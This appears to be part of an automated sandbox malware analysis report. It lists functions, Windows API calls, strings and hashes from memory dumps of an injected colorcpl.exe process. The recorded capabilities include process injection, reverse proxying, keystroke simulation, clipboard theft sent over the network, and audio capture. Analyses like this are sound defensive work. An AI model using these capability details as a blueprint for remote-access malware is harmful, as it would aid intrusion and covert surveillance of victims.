                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DecodePointer
                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                              • Opcode ID: 6fc6b240c1baed8180d3f7d2d996d9b0338501f02ffeeaa465b85e10ba6fa98d
                                                                                                                              • Instruction ID: a995c729ef227d5f4369f64563ac5794cea4a4f54e669f2725813b74f03e9674
                                                                                                                              • Opcode Fuzzy Hash: 6fc6b240c1baed8180d3f7d2d996d9b0338501f02ffeeaa465b85e10ba6fa98d
                                                                                                                              • Instruction Fuzzy Hash: 11519170900A0ADBDF10DF98E6485EDBBB4FF09308F504189D4C1A7354FB31A9A5CBA6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04677495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 046774F5
                                                                                                                                • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
                                                                                                                              • Sleep.KERNEL32(00000064), ref: 04677521
                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 04677555
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                              • API String ID: 1462127192-2001430897
                                                                                                                              • Opcode ID: 78c0d67986ab5ed0d505dbbb4e8ffc15db56857cf9a4f538ab62167f6823a008
                                                                                                                              • Instruction ID: e0295259c24e638f0e5e822d55aa1bb8f3ed3356032609368e77b5b528cc892d
                                                                                                                              • Opcode Fuzzy Hash: 78c0d67986ab5ed0d505dbbb4e8ffc15db56857cf9a4f538ab62167f6823a008
                                                                                                                              • Instruction Fuzzy Hash: C7310E71950119AAEB18FBA0DCA5DFDB768EF11209F40016DE507A7190FF707E8ACA9C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046673AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(046D2B14,00000000,046D52D8,00003000,00000004,00000000,00000001), ref: 046673DD
                                                                                                                              • GetCurrentProcess.KERNEL32(046D2B14,00000000,00008000,?,00000000,00000001,00000000,04667656,C:\Windows\SysWOW64\colorcpl.exe), ref: 0466749E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentProcess
                                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                              • API String ID: 2050909247-4242073005
                                                                                                                              • Opcode ID: 196b9ae6d433526acb548873fa134a988bf89a422792079ddbde8b1f47d625d1
                                                                                                                              • Instruction ID: 130454450b0a2a90f9029567e6128d2c1b8016719c1109a5c8152b44770f0d2a
                                                                                                                              • Opcode Fuzzy Hash: 196b9ae6d433526acb548873fa134a988bf89a422792079ddbde8b1f47d625d1
                                                                                                                              • Instruction Fuzzy Hash: 3D317E71A42300ABE721EF65EC59F2677B8EF4431EF14185CF51296640FBB9BC048BA9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046ACD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5891da2d8b53be71c2007c00cf07af27521d245dc984af3e7daebc16673f8621
                                                                                                                              • Instruction ID: 4723af2d2e9d3161e76594d9187431707b954564193e8c7a229a43741450220c
                                                                                                                              • Opcode Fuzzy Hash: 5891da2d8b53be71c2007c00cf07af27521d245dc984af3e7daebc16673f8621
                                                                                                                              • Instruction Fuzzy Hash: 8EC1D270E04649AFDF11DFA8D840BADBBB5BF1A304F044199E951A7381E734AD62CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B3D83 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,046B405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 046B3E2F
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3EB2
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B3EEA
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,046B405C,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3F45
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046B3F94
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3F5C
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,046B405C,00000000,00000000,?,00000001,?,?,?,?), ref: 046B3FD8
                                                                                                                              • __freea.LIBCMT ref: 046B4003
                                                                                                                              • __freea.LIBCMT ref: 046B400F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3256262068-0
                                                                                                                              • Opcode ID: ad8cede54684b2a497f8d7635b9b1280f6fad5f2e22ab2486784db23f7bbe25f
                                                                                                                              • Instruction ID: 89b6afeffd76a7d761820c64889fa1995037cced018881d298bf1492e02a944c
                                                                                                                              • Opcode Fuzzy Hash: ad8cede54684b2a497f8d7635b9b1280f6fad5f2e22ab2486784db23f7bbe25f
                                                                                                                              • Instruction Fuzzy Hash: D7919171F00616AADB218E65CC40AEEBBB59B19314F08055AED81E7381FB25ECC1CBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046A5179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 046A8215: GetLastError.KERNEL32(?,0469F720,0469A7F5,0469F720,046D4EF8,?,0469CE15,FF8BC35D,046D4EF8,046D4EF8), ref: 046A8219
                                                                                                                                • Part of subcall function 046A8215: _free.LIBCMT ref: 046A824C
                                                                                                                                • Part of subcall function 046A8215: SetLastError.KERNEL32(00000000,FF8BC35D,046D4EF8,046D4EF8), ref: 046A828D
                                                                                                                                • Part of subcall function 046A8215: _abort.LIBCMT ref: 046A8293
                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 046A5423
                                                                                                                              • _free.LIBCMT ref: 046A5494
                                                                                                                              • _free.LIBCMT ref: 046A54AD
                                                                                                                              • _free.LIBCMT ref: 046A54DF
                                                                                                                              • _free.LIBCMT ref: 046A54E8
                                                                                                                              • _free.LIBCMT ref: 046A54F4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                              • String ID: C
                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                              • Opcode ID: 194b6995c20be89b233c1f80809dc7104717a3d58a7801768a0b4900939ec088
                                                                                                                              • Instruction ID: 84b645cc754c8a690f0dbf6e49814e72a362f0607b7f274a122b1f546f4580c4
                                                                                                                              • Opcode Fuzzy Hash: 194b6995c20be89b233c1f80809dc7104717a3d58a7801768a0b4900939ec088
                                                                                                                              • Instruction Fuzzy Hash: 7DB12A75A01619ABDB24DF18C884AADB7B4FF58308F54459ED94AA7350F770BEA0CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06725E85 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$_abort_memcmp
                                                                                                                              • String ID: C
                                                                                                                              • API String ID: 137591632-1037565863
                                                                                                                              • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                              • Instruction ID: 921af8970de8acccb8ce19ed01bef9556cc0cd088d6fadd2098abfe03b79d333
                                                                                                                              • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                                                                                                                              • Instruction Fuzzy Hash: 09B11B75D1122A9FDB64DF18CC88AADB7B5FF08314F5485AAD909A7350E731AE90CF80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0467490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: tcp$udp
                                                                                                                              • API String ID: 0-3725065008
                                                                                                                              • Opcode ID: 911248b39c816d676608a16717375c66a2b73c502abb2cde02de43239e8464de
                                                                                                                              • Instruction ID: 3c093848b069a6f58130832a100a70d8c4f9783501a9df4f9aebaf64361c16c6
                                                                                                                              • Opcode Fuzzy Hash: 911248b39c816d676608a16717375c66a2b73c502abb2cde02de43239e8464de
                                                                                                                              • Instruction Fuzzy Hash: 76716A706083028FDB24CE25C988B2AB7E4EFA8745F14442EF89587355FB74ED45CB96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046714F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Eventinet_ntoa
                                                                                                                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                              • API String ID: 3578746661-168337528
                                                                                                                              • Opcode ID: f89dd5b6e52cef669cd19eae2fc469f56f437c6b5894760aec6a2895f0be6240
                                                                                                                              • Instruction ID: 9faaefdef4ffd3ab857edfe375034314e12ab3bb28c2061e0e9788a491779e66
                                                                                                                              • Opcode Fuzzy Hash: f89dd5b6e52cef669cd19eae2fc469f56f437c6b5894760aec6a2895f0be6240
                                                                                                                              • Instruction Fuzzy Hash: DF519031B042445BEB14FB38C869ABE36A5EB96608F40455EE403977D0FF78BD06C79A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04677CDF Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 04677F2C: __EH_prolog.LIBCMT ref: 04677F31
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,Function_000660A4), ref: 04677DDC
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04677DE5
                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 04677DF4
                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 04677DA8
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                                              • String ID: <$@$Temp
                                                                                                                              • API String ID: 1704390241-1032778388
                                                                                                                              • Opcode ID: dc36b04a1622b40a4911fe71cd95f332d76075c5405ff7000b71c829dbe9c283
                                                                                                                              • Instruction ID: 783bbeb7fc4e6f07dc1bc1213097065ffe2cbf3f1843d0f3d0c0f38672938098
                                                                                                                              • Opcode Fuzzy Hash: dc36b04a1622b40a4911fe71cd95f332d76075c5405ff7000b71c829dbe9c283
                                                                                                                              • Instruction Fuzzy Hash: B9414931E00209ABEB14FB60DD65AFDB778AF51319F40416CE50B66190FF743A9ACB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04667963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,046D4EE0,Function_00065FA4,?,00000000,04667FFC,00000000), ref: 046679C5
                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,04667FFC,00000000,?,?,0000000A,00000000), ref: 04667A0D
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,04667FFC,00000000,?,?,0000000A,00000000), ref: 04667A4D
                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04667A6A
                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 04667A95
                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 04667AA5
                                                                                                                                • Part of subcall function 04664B96: WaitForSingleObject.KERNEL32(?,000000FF,?,046D4EF8,04664C49,00000000,?,?,?,046D4EF8,0466530B), ref: 04664BA5
                                                                                                                                • Part of subcall function 04664B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0466548B), ref: 04664BC3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                              • String ID: .part
                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                              • Opcode ID: 9503e0f6a6239eb1f7d57b1feebe291f63f83747b4ae06ccf5fb4d66f131faad
                                                                                                                              • Instruction ID: fcf872241c9818fd11c4083e712781594d94cbc201015edd3dc1d01ded59c9bf
                                                                                                                              • Opcode Fuzzy Hash: 9503e0f6a6239eb1f7d57b1feebe291f63f83747b4ae06ccf5fb4d66f131faad
                                                                                                                              • Instruction Fuzzy Hash: 77318971508340AFD310EB20D8949DBB7E8FF9531AF004A1DB58692150FF74AA48CB9A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AAC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0469EA24,0469EA24,?,?,?,046AAE9A,00000001,00000001,73E85006), ref: 046AACA3
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046AACDB
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,046AAE9A,00000001,00000001,73E85006,?,?,?), ref: 046AAD29
                                                                                                                              • __alloca_probe_16.LIBCMT ref: 046AADC0
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 046AAE23
                                                                                                                              • __freea.LIBCMT ref: 046AAE30
                                                                                                                                • Part of subcall function 046A6137: HeapAlloc.KERNEL32(00000000,0469529C,?,?,04698847,?,?,?,?,?,0466DE62,0469529C,?,?,?,?), ref: 046A6169
                                                                                                                              • __freea.LIBCMT ref: 046AAE39
                                                                                                                              • __freea.LIBCMT ref: 046AAE5E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2597970681-0
                                                                                                                              • Opcode ID: d287e7e0d7a1fe189e3d4efce1d322448a75d5fe5e992b03d6e835d303e769a2
                                                                                                                              • Instruction ID: b24a8d23e02aa025af9df6d2e85340a248a4e6f451a7a4c30e978295de0534f4
                                                                                                                              • Opcode Fuzzy Hash: d287e7e0d7a1fe189e3d4efce1d322448a75d5fe5e992b03d6e835d303e769a2
                                                                                                                              • Instruction Fuzzy Hash: 0C510872600616ABEF255FA0CC40EBBB7A9EB54710B14462EFC05D6250FB74EC61DE60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04679993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 046799CC
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 046799ED
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A0D
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A21
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 04679A37
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04679A54
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 04679A6F
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 04679A8B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InputSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3431551938-0
                                                                                                                              • Opcode ID: cc92c966b2d8ff821d5bb9f222ccf3b0a77b561117866d57e9754a1f6ee20d00
                                                                                                                              • Instruction ID: 42a0b29dac3258eab7db12d23474f0d722457c56f917e053395b261769b1a8fc
                                                                                                                              • Opcode Fuzzy Hash: cc92c966b2d8ff821d5bb9f222ccf3b0a77b561117866d57e9754a1f6ee20d00
                                                                                                                              • Instruction Fuzzy Hash: 3731A1715583086EF311CF51D881BEBBBDCEF98B54F00080EF6808A181D2A2A5C98BA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04676940 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32 ref: 04676941
                                                                                                                              • EmptyClipboard.USER32 ref: 0467694F
                                                                                                                              • CloseClipboard.USER32 ref: 04676955
                                                                                                                              • OpenClipboard.USER32 ref: 0467695C
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0467696C
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 04676975
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0467697E
                                                                                                                              • CloseClipboard.USER32 ref: 04676984
                                                                                                                                • Part of subcall function 04664AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 04664B36
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2172192267-0
                                                                                                                              • Opcode ID: 09d58221939ca38ba57779307cad4baef4d413e895a1ff2d547c4f6c5490101d
                                                                                                                              • Instruction ID: 0a267af602b94c51547dc6a1e95b0353093281b292480be306c6f9ad39797fb6
                                                                                                                              • Opcode Fuzzy Hash: 09d58221939ca38ba57779307cad4baef4d413e895a1ff2d547c4f6c5490101d
                                                                                                                              • Instruction Fuzzy Hash: 8B0171B12143009FE714BB70D8486BE77A9EF95705F40141DE607C2190FF38AC48CAA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046B0A25 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: ddfebc8e915e9604b9b9c6f47dd6507fc3dedd16616b7cdd95a6b4b99a323d94
                                                                                                                              • Instruction ID: 85a667752bff3c384cfc8451a98b944430ad2ce8cc296373d25ec112a008af9e
                                                                                                                              • Opcode Fuzzy Hash: ddfebc8e915e9604b9b9c6f47dd6507fc3dedd16616b7cdd95a6b4b99a323d94
                                                                                                                              • Instruction Fuzzy Hash: AE61B175E00205AFEB20CF68C841BDABBF4EB15714F1441AAE994EB352F771AD818BD4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06731731 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 066E0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_66e0000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _free
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 269201875-0
                                                                                                                              • Opcode ID: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                                                                                                              • Instruction ID: 040af76ab1abc9b90ea1d00734cd042e1c305edcde5c8a9c9bcf3cb28ecb043d
                                                                                                                              • Opcode Fuzzy Hash: bf6a2d62285109b65615641ef8a9ee438ca725d72dbf644c1fcc8e573ee560d0
                                                                                                                              • Instruction Fuzzy Hash: 4B61F775D00369AFDBA0CF68CC41BAEBBF5EF04720F544169EA54EB242E7309941CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 046AB3BC Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,046ABB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 046AB3FE
                                                                                                                              • __fassign.LIBCMT ref: 046AB479
                                                                                                                              • __fassign.LIBCMT ref: 046AB494
                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 046AB4BA
                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,046ABB31,00000000,?,?,?,?,?,?,?,?,?,046ABB31,?), ref: 046AB4D9
                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,046ABB31,00000000,?,?,?,?,?,?,?,?,?,046ABB31,?), ref: 046AB512
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1324828854-0
                                                                                                                              • Opcode ID: b947fc6d8ac663bf2065c7bb8ccfdf939ce5e4c804513a338766b42ec6dce31f
                                                                                                                              • Instruction ID: 4c1d965f8361a43bab82b299725798810c352a2d541d54d4cd0802873ab8c2f8
                                                                                                                              • Opcode Fuzzy Hash: b947fc6d8ac663bf2065c7bb8ccfdf939ce5e4c804513a338766b42ec6dce31f
                                                                                                                              • Instruction Fuzzy Hash: D151B3B0A00649AFDB10CFA8D894AEEBBF4EF09700F14455AEA55E7281F630BD55CF64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04661D0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _strftime.LIBCMT ref: 04661D50
                                                                                                                                • Part of subcall function 04661A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 04661AD9
                                                                                                                              • waveInUnprepareHeader.WINMM(046D2A88,00000020,00000000,?), ref: 04661E02
                                                                                                                              • waveInPrepareHeader.WINMM(046D2A88,00000020), ref: 04661E40
